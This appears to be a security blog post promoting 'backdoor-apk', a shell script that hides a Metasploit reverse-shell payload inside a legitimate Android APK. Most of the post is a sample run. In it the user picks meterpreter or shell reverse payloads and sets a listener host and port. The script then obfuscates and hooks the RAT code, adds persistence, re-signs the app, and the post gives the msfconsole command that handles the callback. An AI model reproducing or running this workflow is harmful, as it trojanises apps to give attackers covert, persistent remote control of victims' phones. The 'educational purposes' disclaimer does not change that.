Backdoor APK is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Download and Install:
Run the following command to execute backdoor-apk
________ / ______ \ || _ _ || ||| || ||| AAAAAA PPPPPPP KKK KKK |||_||_||| AAA AAA PPP PPP KKK KKK || _ _o|| (o) AAA AAA PPP PPP KKKKKK ||| || ||| AAAAAAAA PPPPPPPP KKK KKK |||_||_||| AAA AAA PPP KKK KKK ||______|| AAA AAA PPP KKK KKK /__________\ ________|__________|__________________________________________ /____________\ |____________| Dana James Traversie [*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016 [+] Android payload options: 1) meterpreter/reverse_http 4) shell/reverse_http 2) meterpreter/reverse_https 5) shell/reverse_https 3) meterpreter/reverse_tcp 6) shell/reverse_tcp [?] Please select an Android payload option: 2 [?] Please enter an LHOST value: 10.6.9.31 [?] Please enter an LPORT value: 443 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [*] Generating RAT APK file...done. [*] Decompiling RAT APK file...done. [*] Decompiling original APK file...done. [*] Merging permissions of original and payload projects...done. [*] Running proguard on RAT APK file...done. [*] Decompiling obfuscated RAT APK file...done. [*] Creating new directories in original project for RAT smali files...done. [*] Copying RAT smali files to new directories in original project...done. [*] Fixing RAT smali files...done. [*] Obfuscating const-string values in RAT smali files...done. [*] Locating smali file to hook in original project...done. [*] Adding hook in original smali file...done. [*] Adding persistence hook in original project...done. [*] Recompiling original project with backdoor...done. [*] Generating RSA key for signing...done. [*] Signing recompiled APK...done. [*] Verifying signed artifacts...done. [*] Aligning recompiled APK...done.
Note: The recompiled APK will be found in the ‘original/dist’ directory.
Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script:
msfconsole -r backdoor-apk.rc
Latest posts by Unallocated Author (see all)
- PrepAway – An Interactive Environment for Vmware Certification Exams Preparation - September 12, 2019
- Is it Important to Communicate with Other Hackers Across the Globe? - September 11, 2019
- How to Protect your Online Data in 2019 - September 11, 2019